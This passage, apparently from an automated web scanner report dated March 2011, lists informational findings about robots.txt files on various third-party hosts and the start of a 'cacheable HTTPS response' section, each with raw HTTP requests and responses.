P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 10 Jul 2009 20:04:47 GMT
ETag: "11e006-1a-46e5f7bee35c0"
Cteonnt-Length: 26
Content-Type: text/plain
Cache-Control: private, max-age=86400
Date: Fri, 25 Mar 2011 19:13:23 GMT
Content-Length: 26
Connection: close

User-agent: *
Disallow: /
26.10. http://music.aol.com/_uac/adpage.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://music.aol.com
Path:   /_uac/adpage.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: music.aol.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:21 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 2325
Keep-Alive: timeout=5, max=999993
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Sitemap: http://music.aol.com/static_sitemap.xml
Sitemap: http://music.aol.com/video_sitemap_index.xml
Sitemap: http://music.aol.com/artist_sitemap_index.xml
Sitemap: http://music.ao
...[SNIP]...
26.11. http://o.sa.aol.com/b/ss/aolcommem,aolsvc/1/H.21/s83462371905334  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.sa.aol.com
Path:   /b/ss/aolcommem,aolsvc/1/H.21/s83462371905334

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: o.sa.aol.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:35:55 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "d919a-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www357
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
26.12. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/1161054613/Top/Dom_Ent/Google-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/72634857383031356952384144615a52  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/1161054613/Top/Dom_Ent/Google-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/72634857383031356952384144615a52

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oasc05139.247realmedia.com

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:13:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 10 Jul 2009 20:04:47 GMT
ETag: "11e006-1a-46e5f7bee35c0"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /
26.13. http://pagead2.googlesyndication.com/pagead/imgad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Fri, 25 Mar 2011 19:15:11 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
26.14. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Sun, 27 Mar 2011 20:36:18 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sat, 26 Mar 2011 20:36:18 GMT
Server: QS

User-agent: *
Disallow: /
26.15. http://portal.smartertools.com/ST.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /ST.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: portal.smartertools.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 24 Mar 2011 15:51:36 GMT
Accept-Ranges: bytes
ETag: "074f25a3beacb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:43:11 GMT
Connection: close
Content-Length: 809

User-agent: *
Disallow: /WebResource.axd
Disallow: /ScriptResource.axd
Disallow: /About/Checkup.aspx
Disallow: /About/frmCheckup.aspx
Disallow: /Agent/
Disallow: /App_Data/
Disallow: /App_Theme
...[SNIP]...
26.16. http://s0.2mdn.net/2450389/Capella_DR_standard_Online_Learn_728x90.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /2450389/Capella_DR_standard_Online_Learn_728x90.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Fri, 25 Mar 2011 13:50:09 GMT
Expires: Thu, 10 Mar 2011 13:25:12 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Age: 19388
Cache-Control: public, max-age=86400

User-agent: *
Disallow: /
26.17. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY6_ACIPTwAioFcrgAAAcyBWu4AAB_  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing-cache.google.com
Path:   /safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY6_ACIPTwAioFcrgAAAcyBWu4AAB_

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Fri, 25 Mar 2011 19:39:55 GMT
Expires: Fri, 25 Mar 2011 19:39:55 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
26.18. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Fri, 25 Mar 2011 19:39:54 GMT
Expires: Fri, 25 Mar 2011 19:39:54 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
26.19. https://secure.shareit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.shareit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.shareit.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 17:12:17 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Last-Modified: Wed, 07 Sep 2005 17:59:11 GMT
ETag: "e2f11-19-431f2a6f"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.20. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 26 Mar 2011 20:36:23 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /
26.21. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.30.147.196
X-Cnection: close
Date: Sat, 26 Mar 2011 20:36:08 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...
26.22. http://toolbarqueries.clients.google.com/tbproxy/af/query  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://toolbarqueries.clients.google.com
Path:   /tbproxy/af/query

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: toolbarqueries.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Fri, 25 Mar 2011 19:13:27 GMT
Expires: Fri, 25 Mar 2011 19:13:27 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
26.23. http://tools.google.com/service/update2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tools.google.com
Path:   /service/update2

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tools.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Fri, 25 Mar 2011 23:34:12 GMT
Expires: Fri, 25 Mar 2011 23:34:12 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
26.24. http://www.citysbest.com/media/citysbest-min.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /media/citysbest-min.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.citysbest.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:19 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 150
Keep-Alive: timeout=5, max=999708
Connection: Keep-Alive
Content-Type: text/plain

user-agent: *
Disallow: /forward
Disallow: /traffic
Disallow: /mm_track
Disallow: /_uac/adpage.html
Sitemap: http://www.citysbest.com/sitemap.xml
26.25. http://www.cramerdev.com/weblog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cramerdev.com
Path:   /weblog/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cramerdev.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
X-Powered-By: Markup Factory
Date: Fri, 25 Mar 2011 19:25:16 GMT
Connection: close

User-agent: *
Disallow:
26.26. https://www.godaddy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:24 GMT
Connection: close
Content-Length: 718

#
# robots.txt
#
User-agent: Googlebot
Disallow: /about/godaddy-chinese.aspx
Disallow: /app
Disallow: /imag
Disallow: /out
Disallow: /gdshop/app
Disallow: /gdshop/clo
Disallow: /gdshop/con
Disallow: /
...[SNIP]...
26.27. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Fri, 25 Mar 2011 19:13:26 GMT
Expires: Fri, 25 Mar 2011 19:13:26 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js
26.28. http://www.google.com/uds/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /uds/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Fri, 25 Mar 2011 19:08:27 GMT
Expires: Fri, 25 Mar 2011 19:08:27 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
26.29. http://www.googleadservices.com/pagead/conversion/1028748950/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1028748950/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Fri, 25 Mar 2011 19:16:00 GMT
Expires: Fri, 25 Mar 2011 19:16:00 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
26.30. http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html%20%20  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/03/26/geraldine-ferraro-dead-dies_n_840995.html%20%20

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Fri, 21 May 2010 12:59:43 GMT
ETag: "610acec-b5-4871a43c92dc0"
Content-Type: text/plain; charset=utf-8
Date: Sat, 26 Mar 2011 20:36:01 GMT
Content-Length: 181
Connection: close

# All robots will spider the domain
User-agent: *
Disallow:

User-agent: *
Disallow: /backstage/

User-agent: *
Disallow: /blackberry/

User-agent: *
Disallow: /users/becomeFan.php
26.31. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.insideup.com

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:15:58 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Fri, 25 Mar 2011 07:17:03 GMT
ETag: "1a1780-4a-49f49616ff9c0"
Accept-Ranges: bytes
Content-Length: 74
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /searchvendor


User-agent: dotbot
Disallow: /

26.32. http://www.manitu.de/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.manitu.de

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:05:58 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
Last-Modified: Mon, 12 Apr 2010 07:16:51 GMT
ETag: "85018a-19-4bc2c8e3"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
26.33. http://www.pandasecurity.com/virus_info/flash/pandaThreatWatch_migracion.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pandasecurity.com
Path:   /virus_info/flash/pandaThreatWatch_migracion.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pandasecurity.com

Response

HTTP/1.0 200 OK
Content-Length: 286
Content-Type: text/plain
Last-Modified: Tue, 15 Dec 2009 15:33:52 GMT
Accept-Ranges: bytes
ETag: "27127e19c7dca1:2e6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 17:03:28 GMT
Connection: close

...User-agent: *
Allow: /CMSPANDA/camaleon/Rss/Rss.aspx
Allow: /NR/rdonlyres/
Allow: /homeusers/media/press-releases/viewnews
Allow: /virus_info/exports/rss/pandaeng.xml

Allow: /virus_info/expor
...[SNIP]...
26.34. https://www.plimus.com/jsp/buynow.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.plimus.com
Path:   /jsp/buynow.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.plimus.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 17:12:16 GMT
Server: Apache
Last-Modified: Mon, 07 Mar 2011 12:50:20 GMT
ETag: "da04a4-295-49de3f0353b00"
Accept-Ranges: bytes
Content-Length: 661
P3P: policyref="http://www.plimus.com/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /jsp/
Disallow: /jsp/cart.jsp
Disallow: /jsp/catlist.jsp
Disallow: /jsp/escalate/escalate_issue.jsp
Disallow: /jsp/find_order.jsp
Disallow: /jsp/search.jsp

User-Agent: RedCarp
...[SNIP]...
26.35. http://www.smartertools.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartertools.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smartertools.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 25 Mar 2011 21:45:14 GMT
Accept-Ranges: bytes
ETag: "01146ec35ebcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:57:49 GMT
Connection: close
Content-Length: 380

Sitemap: http://www.smartertools.com/sitemap.xml
Sitemap: http://blog.smartertools.com/GoogleSiteMapIndex.ashx
Sitemap: http://forums.smartertools.com/GoogleSiteMapIndex.ashx
User-agent: *
Disallo
...[SNIP]...
26.36. http://www.soundingsonline.com/archives/'+NSFTW+'  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives/'+NSFTW+'

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Content-Length: 642
Content-Type: text/plain
Last-Modified: Thu, 11 Feb 2010 19:29:05 GMT
Accept-Ranges: bytes
ETag: "28a2a7950abca1:341b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 25 Mar 2011 19:13:21 GMT
Connection: close

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...
26.37. http://www.sqlite.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sqlite.org
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sqlite.org

Response

HTTP/1.0 200 OK
Connection: close
Date: Sat, 26 Mar 2011 16:45:00 +0000
Last-Modified: Tue, 01 Feb 2011 01:38:02 +0000
Content-type: text/plain
Content-length: 563

User-agent: *
Disallow: /cvstrac/attach_add
Disallow: /cvstrac/attach_get
Disallow: /cvstrac/chngedit
Disallow: /cvstrac/chngview
Disallow: /cvstrac/dir
Disallow: /cvstrac/filediff
Disallow: /cvstrac/
...[SNIP]...
26.38. https://www.supermedia.com/spportal/spportalFlow.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.supermedia.com

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:14:05 GMT
Content-length: 223
Content-type: text/plain
Last-modified: Thu, 07 Jan 2010 20:46:20 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /images/
Disallow: /spweb/
Disallow: /jsp/
Disallow: /spportal/
Disallow: /landingpages.do
Disallow: /index.jsp
Disallow: /splisting.do
Disallow: /*?

Sitemap: http://www.super
...[SNIP]...
26.39. http://www.superpages.com/inc/social/soc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /inc/social/soc.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.superpages.com

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:38:54 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 02 Sep 2010 18:29:44 GMT
ETag: "1b43-169-ff837600"
Accept-Ranges: bytes
Content-Length: 361
Connection: close
Content-Type: text/plain
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Fri, 25-Mar-2011 19:53:54 GMT;path=/;httponly

User-agent: *
Disallow: /about/contact.html
Disallow: /about/feedback.html
Disallow: /adcode/
Disallow: /RealMedia/ads/
Disallow: /about/search_within_map_feedback.html
Disallow: /products/mail.html
D
...[SNIP]...
26.40. https://www.territoryahead.com/jump.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.territoryahead.com

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:25:05 GMT
Server: Apache
Last-Modified: Thu, 28 Oct 2010 10:16:00 GMT
ETag: "44804d-366-a0e61800"
Accept-Ranges: bytes
Content-Length: 870
Connection: close
Content-Type: text/plain

# ROBOTS.TXT - STANDARD TEMPLATE
#
#
User-agent: *
#
# Dis-allowed directories / files
Disallow: /admin
Disallow: /account/
Disallow: /applet/
Disallow: /basket/
Disallow: /ccm/
Disallow:
...[SNIP]...
26.41. http://www.trustlogo.com/trustlogo/javascript/cot.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trustlogo.com
Path:   /trustlogo/javascript/cot.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trustlogo.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 30 Mar 2011 13:53:36 GMT
Content-Type: text/plain
Content-Length: 161
Last-Modified: Tue, 29 Jun 2010 20:34:02 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /images/
Disallow: /javascript/
Disallow: /certs/
Disallow: /css/
Disallow: /trustlogo/

User-agent: TurnitinBot
Disallow: /

27. Cacheable HTTPS response  previous  next
There are 15 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

27.1. https://a12.alphagodaddy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://a12.alphagodaddy.com
Path:   /

Request

GET / HTTP/1.1
Host: a12.alphagodaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 14:32:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Content-Length: 10
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- 1 -->
27.2. https://feedback.discoverbing.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://feedback.discoverbing.com
Path:   /default.aspx

Request

GET /default.aspx?mkt=en-us&productkey=binglocal&brand=&&locale=en-us&P1=footerlivelocal&P4=LIVE&P2=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&P9=42.35596934774129/-71.05408050119877&searchtype=Local%20Search&backurl=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&scrx=1 HTTP/1.1
Host: feedback.discoverbing.com
Connection: keep-alive
Referer: https://feedback.discoverbing.com/default.aspx?mkt=en-us&productkey=binglocal&brand=&&locale=en-us&P1=footerlivelocal&P4=LIVE&P2=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&P9=42.35596934774129/-71.05408050119877&searchtype=Local%20Search&backurl=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: takemeback=takemeback=http%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%252C%2520MA%26q%3d02110; LNG=feedback.discoverbing.com=en-us; MSIDCookie=33f87e5c-7c8d-48b0-8858-d3cd02b35031

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 26 Mar 2011 01:00:06 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: takemeback=takemeback=http%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%252C%2520MA%26q%3d02110; expires=Sat, 26-Mar-2011 02:00:06 GMT; path=/
Set-Cookie: LNG=feedback.discoverbing.com=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: scrx=1; expires=Mon, 26-Mar-2012 01:00:06 GMT; path=/
Vary: Accept-Encoding
Content-Length: 26967

